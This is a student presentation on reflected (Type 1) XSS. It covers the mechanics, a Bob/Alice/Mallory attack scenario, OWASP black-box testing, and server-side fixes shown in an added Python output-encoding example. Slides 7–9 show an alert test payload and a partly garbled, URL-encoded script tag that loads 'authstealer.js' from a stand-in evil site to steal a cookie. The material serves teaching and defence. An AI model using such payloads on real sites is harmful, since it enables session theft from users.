CSCE 548 Student Presentation Ryan Labrador


1 XSS (Type 1)
CSCE 548 Student Presentation, Ryan Labrador

2 Technical Overview
- Reflected XSS
- Non-Persistent XSS
- Most frequent type of XSS [1]
A simple XSS attack involves three parties: the website, the victim and the attacker. The Type 1 XSS vulnerability is also known as Reflected XSS because the user input is immediately returned (or reflected) back to the user by the web application in some form of response (e.g. an error message or a search result). Type 1 XSS is also known as Non-persistent XSS because the injected attack is not saved on the server or within the web application. [1]

3 Technical Overview
- The attacker finds a vulnerable website.
- The attacker crafts a malicious URL exploiting the vulnerability.
- Through social engineering, the attacker convinces the victim to click the malicious URL.
- The website sends the unvalidated input from the request back to the victim.
- The malicious code is executed in the victim's browser.
Websites vulnerable to Type 1 XSS attacks, as previously stated, return the user input without it being made safe to render in the browser.

4 Technical Overview
- The key to pulling off a successful XSS attack:
  - Social engineering
  - Making the link look safe
- ;</script> vs.
Social engineering: convincing someone to click the link is the hardest part. To accomplish this, the attacker can either make the link appear harmless by keeping the same familiar name, or cover up the URL completely using a URL-shortening service (like TinyURL or Google).

5 Example [3]
- Three actors: Bob, Alice, and Mallory.
- Bob hosts a website that sells goods.
- Alice has an account on Bob's website and buys from there frequently.
- When Alice is logged in, her browser keeps an Authorization Cookie so both she (the client) and the server remember she's logged in. [3]

6 Example [3]
Mallory discovers that Bob's website has an XSS (Type 1) vulnerability. While using the search page, she searches for "puppies". Since Bob's site doesn't sell puppies, the resulting page displays "puppies not found." The URL looks like: This is normal behavior. [3]

7 Example [3]
Mallory uses a script as the search term to confirm her findings: <script type='text/javascript'>alert('xss');</script>. This results in a page that displays "<script type='text/javascript'>alert('xss');</script> not found" as well as an alert box that says "xss." The URL is: This is exploitable behavior. [3]

8 Example [3]
Mallory makes a URL to exploit the vulnerability: m/authstealer.js"></script> In order to better hide the script, Mallory converts the ASCII characters into hexadecimal (URL-encoded) format: rysevilsite.com%2Fauthstealer.js%22%3E She sends an e-mail to members of Bob's site, saying "Check out some cute puppies!" [3]

9 Example [3]
Alice gets the e-mail. Alice loves puppies, so she clicks on the link. The link takes her to Bob's site and searches for "puppies". Since the search comes up empty, the page displays "puppies not found" while the script tag runs quietly in the background. Mallory's script loads and runs a program, authstealer.js. Authstealer.js takes a copy of Alice's Authorization Cookie, and now Mallory can log in appearing to be Alice! [3]

10 Detection Methods (Overview)
The simplest way to test for XSS vulnerabilities (given by the book) is to make a request using malicious code for all the possible input parameters. [2] If any data you entered gets returned in the raw HTML byte stream, you may have XSS issues in your code.
[2] 24 Deadly Sins of Software Security

11 Detection Methods (In-depth)
Black Box Testing [1]
OWASP.org has a three-phase black-box test that will help detect common XSS (Type 1) vulnerabilities:
1. Detect input vectors, e.g. HTTP parameters, POST data, hidden form field values, predefined radio or selection values.
2. Analyze each input vector to detect potential vulnerabilities, by adding harmless input data to trigger responses that alert the tester to a possible vulnerability.
3. Analyze the result and determine if the vulnerability has a realistic impact on the web application's security. Any test input found in the returned web page should have all special characters properly encoded, replaced, or filtered out. [1]

12 Avoidance of Error: Server vs. Client
Server
- Sanitize search input (whitelist/blacklist)
- Redirect invalid requests
Client
- Be aware of what you're doing and what you're clicking on
HTML sanitization: the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired.
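As an added example (not code from the presentation or its references), the check from slide 10 and the server-side fix from slide 12 in Python: a constructed stand-in for Bob's search page in a vulnerable and an output-encoded form, plus a probe that reports which request parameters come back unencoded in the raw HTML. All function, parameter and marker names are assumptions made for the example.

```python
import html

# Constructed stand-in for Bob's search page: `params` plays the role of the
# parsed query string and the return value is the HTML the server would send.
def render_search_vulnerable(params):
    q = params.get("q", "")
    # The raw search term is reflected straight into the HTML byte stream
    # (Type 1 XSS): whatever markup the link carried is rendered as markup.
    return f"<html><body><p>{q} not found</p></body></html>"

def render_search_hardened(params):
    q = params.get("q", "")
    # Output encoding: <, >, &, " and ' become entities before the value is
    # reflected, so the browser shows the search term as text, never as markup.
    # html.escape is correct for text content and quoted attribute values;
    # other contexts (inline scripts, URLs) need a context-specific encoder.
    safe_q = html.escape(q, quote=True)
    return f"<html><body><p>{safe_q} not found</p></body></html>"

# The test from slide 10: put a harmless marker in every parameter and see
# whether it comes back unchanged in the raw HTML. The marker contains the
# characters markup would need but is not a real tag and executes nothing.
PROBE = "<xssprobe>"

def params_reflected_unencoded(render, param_names):
    """Return the parameters whose probe value is reflected without encoding."""
    findings = []
    for name in param_names:
        page = render({name: PROBE})
        if PROBE in page:          # came back byte-for-byte: possible XSS
            findings.append(name)
    return findings

if __name__ == "__main__":
    sample = {"q": "<script>alert('xss')</script>"}   # constructed input
    for label, render in [("vulnerable", render_search_vulnerable),
                          ("hardened", render_search_hardened)]:
        print(label, "reflects unencoded:", params_reflected_unencoded(render, ["q"]))
        print(render(sample))
```

The probe deliberately carries no payload: the finding is that the server echoes angle brackets unencoded, which is all the slide-10 check needs to know.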

13 References
[1] OWASP (INPVAL-001)
[2] 24 Deadly Sins of Software Security
